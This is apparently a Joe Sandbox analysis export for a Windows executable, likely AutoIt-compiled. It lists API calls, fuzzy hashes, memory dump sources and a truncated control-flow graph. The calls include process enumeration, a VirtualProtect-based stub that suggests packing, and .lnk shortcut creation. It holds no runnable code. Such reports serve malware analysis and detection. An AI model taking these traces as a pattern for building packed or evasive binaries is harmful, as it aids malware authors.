                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                        • String ID: SCRIPT
                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                        • Opcode ID: 54551d47be243b2982c75abc4b79d3e861e974958806d0333252d3e3ba1cd28f
                                                                                                                        • Instruction ID: 3a2a564c2d9aa8cb101082c43b1e95bcc6615c14bec77d7fc3e7fe5b30106d7b
                                                                                                                        • Opcode Fuzzy Hash: 54551d47be243b2982c75abc4b79d3e861e974958806d0333252d3e3ba1cd28f
                                                                                                                        • Instruction Fuzzy Hash: 9B117C71204701BFEB258F66EC48F677BBAEBC9B41F148028F412A62A0DB71DD04CA71
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00DD6F7D
                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00DD6F8D
                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00DD6FAC
                                                                                                                        • __wsplitpath.LIBCMT ref: 00DD6FD0
                                                                                                                        • _wcscat.LIBCMT ref: 00DD6FE3
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00DD7022
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1605983538-0
                                                                                                                        • Opcode ID: aa9ba92112dc3394303c9ce2260992e04d8c40c9415f08bbab750bf8313d5d9c
                                                                                                                        • Instruction ID: 08a81f21a20acd7ab9bd35d46b6c4a9cde33fd680846f1d47e927e11f0aaf00f
                                                                                                                        • Opcode Fuzzy Hash: aa9ba92112dc3394303c9ce2260992e04d8c40c9415f08bbab750bf8313d5d9c
                                                                                                                        • Instruction Fuzzy Hash: 6C215071904218AFDB11ABA0CC89BEEB7BCAB49300F5404E6F545E3241E7759F84CB70
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00EF31EA
                                                                                                                        • GetProcAddress.KERNEL32(?,00EECFF9), ref: 00EF3208
                                                                                                                        • ExitProcess.KERNEL32(?,00EECFF9), ref: 00EF3219
                                                                                                                        • VirtualProtect.KERNEL32(00D90000,00001000,00000004,?,00000000), ref: 00EF3267
                                                                                                                        • VirtualProtect.KERNEL32(00D90000,00001000), ref: 00EF327C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1996367037-0
                                                                                                                        • Opcode ID: 85eb2089840252d04838fee7d1d113cc3b734ee55c12f2c950d44f60f153c6ed
                                                                                                                        • Instruction ID: 55c927856a8e343ce50a6518e8badf4c616c658c666495ad02f48f60ebba5612
                                                                                                                        • Opcode Fuzzy Hash: 85eb2089840252d04838fee7d1d113cc3b734ee55c12f2c950d44f60f153c6ed
                                                                                                                        • Instruction Fuzzy Hash: 93513FB1A4535A5BD7209EB8CCC06B4B7A4EB5132872C1739C7E2E73C6EB905E06C760
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DD78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00DD78CB
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00DDF04D
                                                                                                                        • CoCreateInstance.COMBASE(00E1DA7C,00000000,00000001,00E1D8EC,?), ref: 00DDF066
                                                                                                                        • CoUninitialize.COMBASE ref: 00DDF083
                                                                                                                          • Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
                                                                                                                          • Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                        • String ID: .lnk
                                                                                                                        • API String ID: 2126378814-24824748
                                                                                                                        • Opcode ID: 0375c05c42643a0ae30b75c7f8ff575d95f88ce98bb3cc794046de4cee22efcc
                                                                                                                        • Instruction ID: 85dd285185b3f8e6a98f299e8e325467029f334a486d6e11ad01483363aca359
                                                                                                                        • Opcode Fuzzy Hash: 0375c05c42643a0ae30b75c7f8ff575d95f88ce98bb3cc794046de4cee22efcc
                                                                                                                        • Instruction Fuzzy Hash: E2A14975604301AFCB14DF14C884D6ABBE5FF89720F148959F89AAB361CB31ED45CBA1
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(00D9C848,00D9C848), ref: 00DADDA2
                                                                                                                        • FindFirstFileW.KERNEL32(00D9C848,?), ref: 00E04A83
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesFindFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4185537391-0
                                                                                                                        • Opcode ID: 58b6a11bcec2b0d6c80ed0c37acd9e851f92000d497288426843029d7938e7b8
                                                                                                                        • Instruction ID: fc3b172ef15f95a3233ac1959c36eaa59ec93ef9fccbd7ab608480bdbc4f787b
                                                                                                                        • Opcode Fuzzy Hash: 58b6a11bcec2b0d6c80ed0c37acd9e851f92000d497288426843029d7938e7b8
                                                                                                                        • Instruction Fuzzy Hash: 2AE0D8715195117B87146B38DC0D8E9376C9F0633CB104709F976E10E0F7709D4885E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 406e5da9b706345c39c4951d9841ae55054747fad5de456f79a261b398cb690a
                                                                                                                        • Instruction ID: 72716e0bf311ce4bcc771b710b30be63f952f0aa73e7a29d0ca3f8dc2a968c9b
                                                                                                                        • Opcode Fuzzy Hash: 406e5da9b706345c39c4951d9841ae55054747fad5de456f79a261b398cb690a
                                                                                                                        • Instruction Fuzzy Hash: 0D229F74A00205DFDF14DF58C491AAAF7F1FF15300F188169E89AAB391E771E985CBA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3964851224-0
                                                                                                                        • Opcode ID: c192a0d466155af6870999ef46bd01e1649f295149d59a3ce5dbbaae26303dc3
                                                                                                                        • Instruction ID: c34864ca72b7749963460ce95a1822f78d403eefbfcddbbe26b52a436636e84b
                                                                                                                        • Opcode Fuzzy Hash: c192a0d466155af6870999ef46bd01e1649f295149d59a3ce5dbbaae26303dc3
                                                                                                                        • Instruction Fuzzy Hash: E3926B706083419FD714DF18C480B6ABBE1FF85304F18896DF98A9B2A2D775ED85CB62
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: NameUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2645101109-0
                                                                                                                        • Opcode ID: 6323ded518eaddb4cd16135cd6da60ee472b7401768bbf2c31740a75e5ee17c5
                                                                                                                        • Instruction ID: c339c8c3a060ab63e3973006745b648a5c5d140a48668116badbe6f5fc8f7425
                                                                                                                        • Opcode Fuzzy Hash: 6323ded518eaddb4cd16135cd6da60ee472b7401768bbf2c31740a75e5ee17c5
                                                                                                                        • Instruction Fuzzy Hash: B6C002B14040099FC715CB80C9459EAB6BCBB08300F104095A115B1040D7709A459B61
                                                                                                                        APIs
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D9E279
                                                                                                                        • timeGetTime.WINMM ref: 00D9E51A
                                                                                                                        • TranslateMessage.USER32(?), ref: 00D9E646
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00D9E651
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D9E664
                                                                                                                        • LockWindowUpdate.USER32(00000000), ref: 00D9E697
                                                                                                                        • DestroyWindow.USER32 ref: 00D9E6A3
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D9E6BD
                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00E05B15
                                                                                                                        • TranslateMessage.USER32(?), ref: 00E062AF
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00E062BD
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E062D1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                        • API String ID: 2641332412-570651680
                                                                                                                        • Opcode ID: ae1a8e98a40aba9c325e89cff5546f0a593f386ab920d561e06acb08cf106499
                                                                                                                        • Instruction ID: 548acf9f1a22101cb1f37bf7fcfa50dc7f63dc05ced1a6b4873dc1c3d46f3db5
                                                                                                                        • Opcode Fuzzy Hash: ae1a8e98a40aba9c325e89cff5546f0a593f386ab920d561e06acb08cf106499
                                                                                                                        • Instruction Fuzzy Hash: 5562E271608340DFDB24DF24C885BAA77E4FF45304F18496DE98A9B292D771E888CB72
                                                                                                                        APIs
                                                                                                                        • ___createFile.LIBCMT ref: 00DC6C73
                                                                                                                        • ___createFile.LIBCMT ref: 00DC6CB4
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00DC6CDD
                                                                                                                        • __dosmaperr.LIBCMT ref: 00DC6CE4
                                                                                                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00DC6CF7
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00DC6D1A
                                                                                                                        • __dosmaperr.LIBCMT ref: 00DC6D23
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00DC6D2C
                                                                                                                        • __set_osfhnd.LIBCMT ref: 00DC6D5C
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00DC6DC6
                                                                                                                        • __close_nolock.LIBCMT ref: 00DC6DEC
                                                                                                                        • __chsize_nolock.LIBCMT ref: 00DC6E1C
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00DC6E2E
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00DC6F26
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00DC6F3B
                                                                                                                        • __close_nolock.LIBCMT ref: 00DC6F9B
                                                                                                                          • Part of subcall function 00DBF84C: CloseHandle.KERNEL32(00000000,00E3EEC4,00000000,?,00DC6DF1,00E3EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00DBF89C
                                                                                                                          • Part of subcall function 00DBF84C: GetLastError.KERNEL32(?,00DC6DF1,00E3EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00DBF8A6
                                                                                                                          • Part of subcall function 00DBF84C: __free_osfhnd.LIBCMT ref: 00DBF8B3
                                                                                                                          • Part of subcall function 00DBF84C: __dosmaperr.LIBCMT ref: 00DBF8D5
                                                                                                                          • Part of subcall function 00DB889E: __getptd_noexit.LIBCMT ref: 00DB889E
                                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00DC6FBD
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00DC70F2
                                                                                                                        • ___createFile.LIBCMT ref: 00DC7111
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00DC711E
                                                                                                                        • __dosmaperr.LIBCMT ref: 00DC7125
                                                                                                                        • __free_osfhnd.LIBCMT ref: 00DC7145
                                                                                                                        • __invoke_watson.LIBCMT ref: 00DC7173
                                                                                                                        • __wsopen_helper.LIBCMT ref: 00DC718D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 3896587723-2766056989
                                                                                                                        • Opcode ID: eff8b45460f86573d53c93814effd6f59b48a9fb94aee499f2660fecc0d621b4
                                                                                                                        • Instruction ID: ce366b7dfcdb8395bc4c3ac7198cf32c510bf25a535760c71114cb74201b2bdf
                                                                                                                        • Opcode Fuzzy Hash: eff8b45460f86573d53c93814effd6f59b48a9fb94aee499f2660fecc0d621b4
                                                                                                                        • Instruction Fuzzy Hash: D922F2719042079BEB299F68DC51FAE7B75EF04320F28822DE562AB2D2C635CD50DB71

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00DD76ED
                                                                                                                        • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00DD7713
                                                                                                                        • _wcscpy.LIBCMT ref: 00DD7741
                                                                                                                        • _wcscmp.LIBCMT ref: 00DD774C
                                                                                                                        • _wcscat.LIBCMT ref: 00DD7762
                                                                                                                        • _wcsstr.LIBCMT ref: 00DD776D
                                                                                                                        • 752A1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00DD7789
                                                                                                                        • _wcscat.LIBCMT ref: 00DD77D2
                                                                                                                        • _wcscat.LIBCMT ref: 00DD77D9
                                                                                                                        • _wcsncpy.LIBCMT ref: 00DD7804
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscat$FileInfoVersion$A1560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                        • API String ID: 1513093770-1459072770
                                                                                                                        • Opcode ID: d321aaeda9a4c8196713b8b0d219aff0c762981335afa998c5e5a59786c00bdf
                                                                                                                        • Instruction ID: c0b01f45e7071c966ade4586e9ae97ad86659e5098f9f841c12da09cbec7b979
                                                                                                                        • Opcode Fuzzy Hash: d321aaeda9a4c8196713b8b0d219aff0c762981335afa998c5e5a59786c00bdf
                                                                                                                        • Instruction Fuzzy Hash: 6C41F5B2904314BAEB01A7749C47EFF7BACDF55710F14009AF502F2192FB64DA1096B1

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 608 d91f04-d91f9c call d92d1a * 2 call d9c935 * 2 call d97e53 call d9d3d2 * 3 625 e02569-e02575 call db2626 608->625 626 d91fa2-d91fa6 608->626 629 e0257d-e02583 call dce4ea 625->629 628 d91fac-d91faf 626->628 626->629 631 d91fb5-d91fb8 628->631 632 e0258f-e0259b call d9a4f6 628->632 629->632 631->632 634 d91fbe-d91fc7 GetForegroundWindow call d9200a 631->634 639 e025a1-e025b1 call d9a4f6 632->639 640 e02899-e0289d 632->640 641 d91fcc-d91fe3 call d9197e 634->641 639->640 653 e025b7-e025c5 639->653 644 e028ab-e028ae 640->644 645 e0289f-e028a6 call d9c935 640->645 654 d91fe4-d92007 call d95cd3 * 3 641->654 646 e028b0 644->646 647 e028b7-e028c4 644->647 645->644 646->647 651 e028d6-e028da 647->651 652 e028c6-e028d4 call d9b8a7 CharUpperBuffW 647->652 657 e028f1-e028fa 651->657 658 e028dc-e028df 651->658 652->651 656 e025c9-e025e1 call dcd68d 653->656 656->640 671 e025e7-e025f7 call daf885 656->671 664 e0290b EnumWindows 657->664 665 e028fc-e02909 GetDesktopWindow EnumChildWindows 657->665 658->657 663 e028e1-e028ef call d9b8a7 CharUpperBuffW 658->663 663->657 669 e02911-e02930 call dce44e call d92d1a 664->669 665->669 683 e02940 669->683 684 e02932-e0293b call d9200a 669->684 681 e0287b-e0288b call daf885 671->681 682 e025fd-e0260d call daf885 671->682 690 e02873-e02876 681->690 691 e0288d-e02891 681->691 692 e02861-e02871 call daf885 682->692 693 e02613-e02623 call daf885 682->693 684->683 691->654 695 e02897 691->695 692->690 702 e02842-e02848 GetForegroundWindow 692->702 700 e02629-e02639 call daf885 693->700 701 e0281d-e02836 call dd88a2 IsWindow 693->701 698 e02852-e02858 695->698 698->692 710 e02659-e02669 call daf885 700->710 711 e0263b-e02640 700->711 701->654 712 e0283c-e02840 701->712 705 e02849-e02850 call d9200a 702->705 705->698 720 e0267a-e0268a call daf885 710->720 721 e0266b-e02675 710->721 713 e02646-e02657 call d95cf6 711->713 714 e0280d-e0280f 711->714 712->705 722 e0269b-e026a7 call d95be9 713->722 717 e02817-e02818 714->717 717->654 730 e026b5-e026c5 call daf885 720->730 731 e0268c-e02698 call d95cf6 720->731 723 e027e6-e027f0 call d9c935 721->723 733 e02811-e02813 722->733 734 e026ad-e026b0 722->734 732 e02804-e02808 723->732 739 e026e3-e026f3 call daf885 730->739 740 e026c7-e026de call db2241 730->740 731->722 732->656 733->717 734->732 745 e02711-e02721 call daf885 739->745 746 e026f5-e0270c call db2241 739->746 740->732 751 e02723-e0273a call db2241 745->751 752 e0273f-e0274f call daf885 745->752 746->732 751->732 757 e02751-e02768 call db2241 752->757 758 e0276d-e0277d call daf885 752->758 757->732 763 e02795-e027a5 call daf885 758->763 764 e0277f-e02793 call db2241 758->764 769 e027c3-e027d3 call daf885 763->769 770 e027a7-e027b7 call daf885 763->770 764->732 776 e027f2-e02802 call dcd614 